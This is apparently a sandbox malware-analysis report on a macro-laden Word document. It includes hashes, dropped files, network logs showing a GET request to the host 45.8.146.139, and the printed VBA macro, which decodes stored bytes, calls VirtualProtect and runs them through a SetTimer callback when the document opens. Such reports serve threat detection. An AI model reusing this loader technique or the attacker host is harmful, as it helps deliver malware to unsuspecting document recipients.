    airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
    • 45.8.146.139
    wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
    • 45.8.146.139
    wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
    • 45.8.146.139
    courtesyautomotivedoc08.11.docGet hashmaliciousBrowse
    • 45.8.146.139
    drinkcodeblue.file.08.11.22.docGet hashmaliciousBrowse
    • 45.8.146.139
    dodsonimaging,file,08.11.2022.docGet hashmaliciousBrowse
    • 45.8.146.139
    feltenberger doc 08.11.docGet hashmaliciousBrowse
    • 45.8.146.139
    agsilverfile08.11.docGet hashmaliciousBrowse
    • 45.8.146.139
    GitmEGG60Q.exeGet hashmaliciousBrowse
    • 45.159.251.68
    80J4pAFU0A.exeGet hashmaliciousBrowse
    • 45.159.248.53
    Rwwsr82vkS.exeGet hashmaliciousBrowse
    • 45.159.248.53
    sJq1pykxns.exeGet hashmaliciousBrowse
    • 45.159.248.53
    No context
    No context
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:HTML document, ASCII text
    Category:downloaded
    Size (bytes):201
    Entropy (8bit):5.120826232488609
    Encrypted:false
    SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3LZKCezocKqD:J0+oxBeRmR9etdzRxLFez1T
    MD5:33A7649A487B43D650E4D478C96E4588
    SHA1:F10EA1CC461B73EEE86CBE992CC4724F7B4C5175
    SHA-256:469501F44D054081AD49D1D0AB0B8031ECCE6986D17D346CC39DFB7BCF327F76
    SHA-512:24CDCCA259970B669949BD197AA55FD6E05D91B53A05984D3EBB3B219B6D26BDD67165967F1C8960D55E517D7AC46E1E515DD6E5C45DE4923F2FB1B1A98BCF22
    Malicious:false
    Reputation:low
    IE Cache URL:http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
    Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "-f" was not found on this server.</p>.</body></html>.
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:modified
    Size (bytes):1216
    Entropy (8bit):3.0679960309839154
    Encrypted:false
    SSDEEP:24:uZp1Q/svtl/aXiFuWFZsyb/douhISPdddBBlmWmwgVrZrpkQXVhlnlNAq6:40cvutmouhIodddBB8hPPfhHeq6
    MD5:EB17AABF5AEABA10C903E128A8A42ABF
    SHA1:5065A7F1BDBDE9D271C88C2B07BF0CF98EC88A7F
    SHA-256:A2220FFE6B9EF21235D26E997213FABD2F38116D7A31BE35F7A0935D148D9433
    SHA-512:FF025028E03A078BC93E05B9A1CA6267DE6E1CEC3847F64D964F0B99F19218C1271AE9887F7DA53A006D478B9A7C0B865EC9B91616E4C5372EE25A6C6FCB4DCA
    Malicious:false
    Reputation:low
    Preview:MSQMx.............H...................................{*.....~..<.......................................................X...............................WINW........N...............................5...........;...........<...........A...........l...........................................f...........f...N.......Q...............................................................`.......f.......................X...b.......f...S.......f...N...........<...........B...........C...........F...........I...................f...H.......f...............+...........0......./...:......./...;......./.......................z...........z...........................n"..........7#....../...?...............................f...I.......f...........$...............rrl7........rrl7....X...rrl7....X...rrl7....X...rrl7....X...rrl7........rrl7........rrl7....z...rrl7....z...rrl7....z...rrl7........rrl7........rrl7........rrl7........rrl7........rrl7........rrl7........rrl7........\...................cw1p........
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:HTML document, ASCII text
    Category:dropped
    Size (bytes):201
    Entropy (8bit):5.120826232488609
    Encrypted:false
    SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3LZKCezocKqD:J0+oxBeRmR9etdzRxLFez1T
    MD5:33A7649A487B43D650E4D478C96E4588
    SHA1:F10EA1CC461B73EEE86CBE992CC4724F7B4C5175
    SHA-256:469501F44D054081AD49D1D0AB0B8031ECCE6986D17D346CC39DFB7BCF327F76
    SHA-512:24CDCCA259970B669949BD197AA55FD6E05D91B53A05984D3EBB3B219B6D26BDD67165967F1C8960D55E517D7AC46E1E515DD6E5C45DE4923F2FB1B1A98BCF22
    Malicious:true
    Reputation:low
    Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "-f" was not found on this server.</p>.</body></html>.
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:54 2022, mtime=Tue Mar 8 15:45:54 2022, atime=Fri Aug 12 01:06:11 2022, length=2343230, window=hide
    Category:dropped
    Size (bytes):1074
    Entropy (8bit):4.554552292941248
    Encrypted:false
    SSDEEP:12:8SqpUXs9gXg/XAlCPCHaXBKBnB/eLX+WAyXfcfaiFGnicvbNV7p9lAG9DtZ3YilJ:8SqeQ/XTRKJMey+tneRhp9bDv3qVu7D
    MD5:EFFF0D3E50A0D012C05106D066F8ECE9
    SHA1:1CBB4D4ED8A8205BCC101074A39D94F14E851BCC
    SHA-256:685293DAAEDEE9AE46AC93A6EDF6CDF03F2DC0D0805810D2A68DDCFFAA832CAE
    SHA-512:2872E36E61C0D66025B36EA58EDA26C64EDBE8BE82B9F3C67920B8A2C3806695D34FEA7CF4F281B89C33E6AB9E9D1CD5B4A647BA51BBCFB4CB992AB9E3E3471F
    Malicious:false
    Reputation:low
    Preview:L..................F.... ....nI..3...nI..3.........>.#..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....~.2.>.#..U.. .CNEWTO~1.DOC..b......hT..hT..*...r.....'...............c.n.e.w.t.o.n. .d.o.c. .0.8...1.1...2.0.2.2...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\390120\Users.user\Desktop\cnewton doc 08.11.2022.doc.1.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.n.e.w.t.o.n. .d.o.c. .0.8...1.1...2.0.2.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......390120....
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):95
    Entropy (8bit):4.627376468057002
    Encrypted:false
    SSDEEP:3:bDuMJle+FXF7Uk9omX1c6FXF7Uk9ov:bCMXF7p9kuXF7p9y
    MD5:92FF1982FE0A0AF246E8E293141DD9D0
    SHA1:2B3D182D219D3178040B9F2F41B196A4742FE18B
    SHA-256:23ED12834D5AB9375C9AA71150EFFA53645FD337190A76B86AEA3381372D8EC0
    SHA-512:4F9D1DAFADD29B0826B11BEE4AA9F87637B8BD82540FD57C66FC9073442399DB3BA6C0FE4FAAACDC282DFA932E440CA1EBE1D385FE82E690FA37F0BB00664519
    Malicious:false
    Reputation:low
    Preview:[folders]..Templates.LNK=0..cnewton doc 08.11.2022.LNK=0..[doc]..cnewton doc 08.11.2022.LNK=0..
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.503835550707525
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
    MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
    SHA1:23684CCAA587C442181A92E722E15A685B2407B1
    SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
    SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.503835550707525
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
    MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
    SHA1:23684CCAA587C442181A92E722E15A685B2407B1
    SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
    SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
    File type:Zip archive data, at least v2.0 to extract
    Entropy (8bit):7.993716519832146
    TrID:
    • Word Microsoft Office Open XML Format document (49504/1) 49.01%
    • Word Microsoft Office Open XML Format document (43504/1) 43.07%
    • ZIP compressed archive (8000/1) 7.92%
    File name:cnewton doc 08.11.2022.doc
    File size:2343230
    MD5:ee1d6eb5b07b99e65fc0cb477193c35c
    SHA1:9d4dbf701c8ede93a79036dd5a0316da988a2eeb
    SHA256:23b9a20a59041fc7d484957e49ffa7e0f6dba7dbbec0628a4adb69c2e05863ab
    SHA512:869cdd01eb85cd12a1a27dc0099250e4fb33b3ed72a7e0375e80206b07b01aaff108ede1626de99f29c9a7cbc7524a4e4947b976be2e392b2d777c8df1fc54fc
    SSDEEP:49152:xyG/bJ98ozhp4kBA4Y0bRfqmlYOxtKW72swkql:QS8otukBbRfqUjRy7T
    TLSH:C4B5333D16FB0348D87D3A125E1F1EC212BDCD45E01BC82F684B657AB5377846A68EE8
    File Content Preview:PK..........!..U~............._rels/.rels...J.@............4.E..D.....$....T..w-..j........|.zs..z..z.*X.%(v......6O.{PI........`S__._x .C..CR....:....t..R......hI.3..H.Q..*.;..=..y... n.......yo.......[vrf..A..6..3[.>_...-K....\NH!....<..r...E.B..P...<_.
    Icon Hash:e4eea2aaa4b4b4a4
    Document Type:OpenXML
    Number of OLE Files:1
    Has Summary Info:
    Application Name:
    Encrypted Document:False
    Contains Word Document Stream:True
    Contains Workbook/Book Stream:False
    Contains PowerPoint Document Stream:False
    Contains Visio Document Stream:False
    Contains ObjectPool Stream:False
    Flash Objects Count:0
    Contains VBA Macros:True
    General
    Stream Path:VBA/ThisDocument
    VBA File Name:ThisDocument.cls
    Stream Size:2836
    Data ASCII:. J . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . D . ? P t r S a . f e F u n c t . i o n . L i . b " u s e r 3 . 2 " A l i a s . " S e t T i m . e r " ( B y V 8 a l . . . . . A s L o n g * , . . . . . . . 5 . . . . . . .
    Data Raw:01 4a b4 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 44 6f 63 75 6d 65 6e 10 74 22 0d 0a 0a 8c 42 61 73 01 02 8c 31 4e 6f 72 6d 61 6c 02 2e 19 56 47 6c 6f 62 61 6c 21 01 aa 53 70 61 63 01 6c 46 61 08 6c 73 65 0c 4a 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72 75 0d 22 45 78 70 08 6f 73 65 14 1c 54
    Attribute VB_Name = "ThisDocument"
    Attribute VB_Base = "1Normal.ThisDocument"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = True
    Attribute VB_Customizable = True
    Private Declare PtrSafe Function  Lib "user32" Alias "SetTimer" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
    Private Declare PtrSafe Function  Lib "user32" Alias "KillTimer" (ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
    Private Declare PtrSafe Function  Lib "kernel32" Alias "VirtualProtect" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr,  As LongPtr) As LongPtr
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
    Function ()
         = 3
        End Function
    Function (, Optional  = False)
        If  Then
             = UBound()
        Else
             = ((), )
        End If
         = 
        End Function
    Function ()
         = 1
        End Function
    Function (, Optional  = False)
        If  Then
             = Len()
        Else
             = ((), )
        End If
         = 
        End Function
    Function ()
         = 2
        End Function
    Function (, )
         = Mid(,  + 1, 1)
    End Function
    Function (, Optional  = False)
        If  Then
             = VarPtr()
        Else
             = ((), )
        End If
         = 
        End Function
    Function (Optional  = False)
        If  Then
            Set  = CallByName((EF9Yq0sar_("DgrVRLL_I")), EF9Yq0sar_("kMNkamqH7"), VbGet, EF9Yq0sar_("RQeWcJp24"))
        Else
            Set  = (())
        End If
        Set  = 
        End Function
    Function (, Optional  = False)
        If  Then
             = ()
        Else
             = ((), )
        End If
         = 
        End Function
    Function ()
         = 6
        End Function
    Function (, Optional  = False)
        If  Then
            Set  = CallByName((), EF9Yq0sar_("qWfCNVnD"), VbGet, )
        Else
            Set  = ((), )
        End If
        Set  = 
        End Function
    Function (Optional  = False)
        If  Then
             = Timer()
        Else
             = (())
        End If
         = 
        End Function
    Sub (w)
        Dim  As Long
        Dim  As Long
         = () + ()
        Do
             = ()
            DoEvents
        Loop Until  > 
    End Sub
    Function ()
         = 8
        End Function
    Function ()
         = 11
        End Function
    Function (, Optional  = False)
        If  Then
             = CDec()
        Else
             = ((), )
        End If
         = 
        End Function
    Function ()
        ReDim (() - 1) As Byte
        Dim  As Long,  As Long
        Dim :  = EF9Yq0sar_("NsYYh8zYomI0") & EF9Yq0sar_("LJS4KV9")
        For  = 0 To () - 1 Step 2
             =  / 2
            () = 255 - ( & (, ) & (,  + 1))
        Next
         = 
    End Function
    Function ()
         = 5
        End Function
    Function (, Optional  = False)
        If  Then
            Set  = CallByName((), EF9Yq0sar_("Qa6ipUt"), VbGet, )
        Else
            Set  = ((), )
        End If
        Set  = 
        End Function
    Function (, , Optional  = False)
        If  Then
             = Mid(,  + 1, 1)
        Else
             = ((), , )
        End If
         = 
        End Function
    Function ()
         = 4
        End Function
    Function (, Optional  = False)
        If  Then
            Set  = GetObject()
        Else
            Set  = ((), )
        End If
        Set  = 
        End Function
    Function ()
        #If Win64 Then
             = True
        #Else
             = False
        #End If
    End Function
    Function (Optional  = False)
        If  Then
            Set  = ActiveDocument
        Else
            Set  = (())
        End If
        Set  = 
        End Function
    Function ()
         = 0
        End Function
    Function ()
         = 9
        End Function
    Public Function EF9Yq0sar_(strInput)
            EF9Yq0sar_ = StrReverse(ActiveDocument.CustomDocumentProperties(strInput))
        End Function
    Function (, Optional  = Empty, Optional  = Empty, Optional  = Empty)
        Select Case 
                Case ()
                    Set  = (, True)
                Case ()
                    Set  = (, True)
                Case ()
                    Set  = (True)
                Case ()
                    Set  = (True)
                Case ()
                    Set  = (, True)
                Case ()
                     = (, True)
                Case ()
                     = (, True)
                Case ()
                     = (, True)
                Case ()
                     = (, True)
                Case ()
                     = (, , True)
                Case ()
                     = (True)
                Case ()
                     = (, True)
            End Select
    End Function
    Function ()
         = 10
        End Function
    Private Sub Document_Open()
        Dim () As Byte
        If () Then
             = ((EF9Yq0sar_("LifoJT1h")).Value)
        Else
             = ((EF9Yq0sar_("GCTApkFFHZi")).Value)
        End If
        Dim  As LongPtr
        Dim  As LongPtr
        Dim  As LongPtr
        Dim  As LongPtr
         = () + 1
         = VarPtr((0))
         , , 64, VarPtr()
                ()(EF9Yq0sar_("WTLDU9FnjbYG")) = EF9Yq0sar_("tBMGa1xAHXb")
             = (0, , 1, )
         1
         0, 
        ().Remove (EF9Yq0sar_("fOPfEGMIdzSh"))
        ().Remove (EF9Yq0sar_("mftKV8ory"))
        ReDim (1)
    End Sub
    Function ()
         = 7
        End Function
    

    General
    Stream Path:PROJECT
    File Type:ASCII text, with CRLF line terminators
    Stream Size:369
    Entropy:5.302596554682153
    Base64 Encoded:True
    Data ASCII:I D = " { 1 4 9 A B 1 3 B - 1 5 A A - 4 3 8 2 - 8 9 7 7 - F C 2 5 F 7 E D D 7 B A } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 A 3 8 C 5 0 D F B 1 1 F B 1 1 F B 1 1 F B 1 1 " . . D P B = " 7 4 7 6 8 B 4 F F F 8 8 0 0 8 8 0 0 8 8 " . . G C = " A E A C 5 1 9 1 B 1 F 1 E A F 2 E A F 2 1 5 " . . . . [ H o s t E x t e n d e r I n f
    Data Raw:49 44 3d 22 7b 31 34 39 41 42 31 33 42 2d 31 35 41 41 2d 34 33 38 32 2d 38 39 37 37 2d 46 43 32 35 46 37 45 44 44 37 42 41 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
    General
    Stream Path:PROJECTwm
    File Type:data
    Stream Size:41
    Entropy:3.0773844850752607
    Base64 Encoded:False
    Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
    Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
    General
    Stream Path:VBA/_VBA_PROJECT
    File Type:ISO-8859 text, with no line terminators
    Stream Size:7
    Entropy:1.8423709931771088
    Base64 Encoded:False
    Data ASCII:a . . .
    Data Raw:cc 61 ff ff 00 00 00
    General
    Stream Path:VBA/__SRP_2
    File Type:data
    Stream Size:5108
    Entropy:1.9370407590218233
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . " . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ) > . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . .
    Data Raw:72 55 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 22 00 1f 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07
    General
    Stream Path:VBA/__SRP_3
    File Type:data
    Stream Size:2724
    Entropy:2.6897674029679903
    Base64 Encoded:False
    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . ` . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . 1 . . . . . . . . . . . , . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . a . . . . . . . . . . . X . . p . . . . . . ! . . . . . . . . . . . a . . . . . . .
    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 60 00 b1 08 00 00 00 00 00 00 00 00 00 00 00 00 04 70 10 00 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
    General
    Stream Path:VBA/dir
    File Type:data
    Stream Size:486
    Entropy:6.304387507848704
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . I d - . . . " . < . . . . r s t d o . l e > . . s . t . . d . o . l . e . ( . . h . . ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ s y s @ t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t . i o n . E N o r ( m a l E N C r . m . a F . . c E C . . . . m . ! O f f i c g O . f . i . c g . . g 2 D F 8 D 0 . 4 C - 5 B F A - .
    Data Raw:01 e2 b1 80 01 00 04 00 00 00 03 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 00 08 06 12 09 02 12 80 c5 49 f4 64 2d 00 0c 02 22 0a 3c 02 0a 16 02 72 73 74 64 6f 08 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 00 28 0d 00 68 00 11 5e 00 03 2a 5c 00 47 7b 30 30 30
    TimestampSource PortDest PortSource IPDest IP
    Aug 11, 2022 19:05:34.165986061 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 19:05:34.269232035 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 19:05:34.269417048 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 19:05:34.270216942 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 19:05:34.373137951 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 19:05:34.389308929 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 19:05:34.389625072 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 19:05:39.394372940 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 19:05:39.394573927 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 19:06:39.472704887 CEST4917380192.168.2.2245.8.146.139
    • 45.8.146.139
    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.224917345.8.146.13980C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    TimestampkBytes transferredDirectionData
    Aug 11, 2022 19:05:34.270216942 CEST0OUTGET /fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 45.8.146.139
    Connection: Keep-Alive
    Aug 11, 2022 19:05:34.389308929 CEST1INHTTP/1.1 200 OK
    Date: Thu, 11 Aug 2022 17:05:34 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
    X-Powered-By: PHP/7.2.34
    Content-Length: 201
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 2d 66 22 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "-f" was not found on this server.</p></body></html>


    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Target ID:0
    Start time:19:06:12
    Start date:11/08/2022
    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Imagebase:0x13fb60000
    File size:1423704 bytes
    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Reset < >

      Execution Graph

      Execution Coverage:8.1%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:0%
      Total number of Nodes:3
      Total number of Limit Nodes:0
      execution_graph 165 683eb40 166 683eb7b SetTimer 165->166 167 683ebce 166->167

      Callgraph

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 683eb40-683ebcc SetTimer 2 683ebce-683ebd2 0->2
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.1037901418.000000000683E000.00000040.00000001.00020000.00000000.sdmp, Offset: 0683E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_683e000_WINWORD.jbxd
      Similarity
      • API ID: Timer
      • String ID:
      • API String ID: 2870079774-0
      • Opcode ID: 95b3ea207672e6e99b7100d749e767922e85d9728938e9f59398970c495cfdbc
      • Instruction ID: 390de3244c386e985754df6981c45d115293ba6d2903c4d582777ca68e9b206b
      • Opcode Fuzzy Hash: 95b3ea207672e6e99b7100d749e767922e85d9728938e9f59398970c495cfdbc
      • Instruction Fuzzy Hash: 4F11D62110DBC84FD75B9B28D865A157BF0EF5B300F0940DBD489CB1A7D924A848C766
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 3 6875e01-6875e48 4 6875e8a-6875ec0 3->4 5 6875e4a-6875e78 3->5 6 6875ed3-6875ed9 5->6 7 6875e7a-6875e82 5->7 10 6875ee2-6875f7a 6->10 11 6875edc-6875ee1 6->11 7->4 9 6875e84-6875e89 7->9 9->4 12 6875f7e-6875f82 10->12 11->10
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1038037434.0000000006874000.00000040.00000001.00020000.00000000.sdmp, Offset: 06874000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_6874000_WINWORD.jbxd
      Similarity
      • API ID:
      • String ID: \I0n
      • API String ID: 0-2862130149
      • Opcode ID: bb0e0551bc67b02ed728c49fcc1889504744bd8383698300c9637759a6ea2074
      • Instruction ID: ebf9799bd7b30700a1def70ec5a60389df962eeb7167ae33dc1a03fc1574efa7
      • Opcode Fuzzy Hash: bb0e0551bc67b02ed728c49fcc1889504744bd8383698300c9637759a6ea2074
      • Instruction Fuzzy Hash: B451A72140E7C84FC7638B789864AA57FB0AF67210B1E45DBD4C8CF1A3DA18994AC763
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 13 6875ec1-6875ed9 14 6875ee2-6875f7a 13->14 15 6875edc-6875ee1 13->15 16 6875f7e-6875f82 14->16 15->14
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1038037434.0000000006874000.00000040.00000001.00020000.00000000.sdmp, Offset: 06874000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_6874000_WINWORD.jbxd
      Similarity
      • API ID:
      • String ID: \I0n
      • API String ID: 0-2862130149
      • Opcode ID: cb1397fb40651bae72064bfd3e774219b36be362952836bd086c02382d94905e
      • Instruction ID: 79ab79d4efc2535bcf68307e6f2b05b3736c2be203c08ae3c0e60b6d777134eb
      • Opcode Fuzzy Hash: cb1397fb40651bae72064bfd3e774219b36be362952836bd086c02382d94905e
      • Instruction Fuzzy Hash: C021D02140E7C84FC7639B689864A907FF0EF67210F1A05DBD4C8CB1A3D9289949C763
      Uniqueness

      Uniqueness Score: -1.00%

